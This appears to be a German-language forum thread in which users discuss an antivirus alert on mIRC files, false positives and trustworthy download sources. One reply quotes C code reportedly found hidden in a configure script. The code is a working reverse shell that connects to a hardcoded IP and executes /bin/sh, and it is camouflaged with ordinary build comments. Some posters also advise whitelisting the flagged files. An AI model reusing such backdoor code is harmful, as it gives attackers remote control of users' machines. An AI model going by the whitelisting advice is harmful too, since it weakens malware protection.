Infizizierte Mirc Dateien

Hallo. Habe gestern eine Virusmeldung des Antivirusprogramm bekommen.
Drin stand das Dateien von Mirc infiziert seien.
Nämlich mit dem angeblichen Virus BDS/IRCFLOOD.T4
Ist das wirklich ein Virus? Und wenn was richtet es an? Habe nichts gefunden über diesen Virus.

Gruß

MrSwissi

Es kann auch sein das dein Virus scanner mirc-datein als viren erkennt geht mir manchmal auch so. Meitens ist das so das diese datein nuker spammer etc. sind die dein anti-virus programm erkennt

Dumm ist nur das ich Mirc nicht mehr ausführen kann.
Habe Mirc zuerst entfernt dann neu runtergeladen. Aber das Antivirusprogramm verhindert das Installieren des Programms. Klar kann ich ihn deaktivieren beim installieren von Mirc. Aber irgemdwann muß ich ihn wieder einschalten und dann geht das Spiel von vorne los.

MrSwissi

welchen scanner benuzt du? man kann bestimmte datein/dateitypen sicher in eine ignorierliste verschieben
greetz

so bin wieder da. hab mir nur schnell antivir gesaugt:
da ist die ignorierliste <optionen><konfigurationmenue> dann bei suchen auf das + klicken und dann <auszulassende datein> und dann alle datein einfügen.
ich hoffe ich mein das richtige

Hallo,

der Virus sagt mir unter diesem Namen zwar nichts, klingt ein wenig nach einem destruktiven mIRC-Script. Die Frage die, diese Diskussion aber IMHO aufgeworfen hat ist, warum du einen Virenscanner benoetigst wenn du diesen nicht ernstnimmst und infizierte Datein trotzdem nutzen moechtest.

@yoda
angeblich soll das kein virus sein.
wenn ich dieses programm direkt vom www.mirc.com runterlade schlägt der virusscanner alarm. kann mir nicht vorstellen das das programm mit wissen von mirc infiziert ist und jedermann das runterladen kann.

mrswissi

@MrSwissi

Ich würde sagen, dass die Antwort von MrSwissi perfekt war.

Antivir wird wohl etwas rumzicken.

Wenn ich Mirc installiere, meckert mein Norton_2002 net.

Gismon

werde den rat von scrat beherzigen und stelle den antivir neu ein und lasse die mirc dateien durchgehen.
wollte nur sicher gehen das es doch kein virus ist.
denn z.b. gibt es einen virus der BDS/IRSFlood.C1 heißt.
dieser angebliche virus hat die endung .T4

mrswissi

Original von MrSwissi
angeblich soll das kein virus sein.
wenn ich dieses programm direkt vom www.mirc.com runterlade schlägt der virusscanner alarm. kann mir nicht vorstellen das das programm mit wissen von mirc infiziert ist und jedermann das runterladen kann.

Du hast zu viel vertrauen in das Netz. Wie kannst du sicherstellen das die Datein nicht veraendert oder ersetzt wurde? Leider sind ja digitale Signaturen unter Windows nur wenig verbreitet.

Wenn ein Virenscanner faelschlicherweise auf eine nicht infizierte Software anspricht wird dies meist recht schnell festgestellt, gerade wenn es sich um eine solch populaere Software handelt. I.d.R wird dann vom Hersteller der Software sowie des Herstellers der Anti-Viren-Software eine Warnung herausgegeben.

Mag sein das es sich tatsaechlich um falschen Alarm handelt, nur ist ein autentisch wirkender FTP-Server ein sichtlich schlechter Indikator fuer diese Bewertung.

Yoda,
der neulich folgenden Code in einem configure-script fand:

Code:
      int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
  /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;   
        sa.sin_port = htons(6667); 
        sa.sin_addr.s_addr = inet_addr(\"204.120.36.206\");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS.  Some functions are actually named 
    something starting with __ and the normal name is an alias.  */
        { char *args[] = { \"/bin/sh\", NULL }; execve(args[0], args, NULL); }

ist zwar weit hergeholt, aber vieleicht ist die downloadquelle nicht ganz sauber. falls du es nicht getan hast würde ich mIRC von der offiziellen homepage downloaden! wenn das auch nichts hilft, lad dir mal ne andere version von mIRC runter.
sonst fällt mir nichts mehr ein

Download Mirc

Ich war nochmals auf www.mirc.com!

Ok - die bieten ja gleich mehrere Download_Möglichkeiten an, aber diese hier habe ich ausprobiert und ich konnte mit Norton_Anti_Virus_2002 kein Virus feststellen.

Und da ich sehr viel halte vom o.g. Virenprogramm, bin ich mir sicher, dass der o.g. Link o.k. ist.

Immer wenn ich mein PC einschalte, kommt es meistens zu Online_Live_Updates seitens Norton.

Und eines dürfte sicher sein, dass die Firma Norton Mirc kennt, so wie wir wissen, wie man einen PC einschaltet.

Norton wäre schön blöd, wenn die ihre Vorreiter-Position durch Nachlässigkeit verlieren würden.

Also - persönliche Meinung - der o.g. Link ist sicher!

Gismon

Zurück
Oben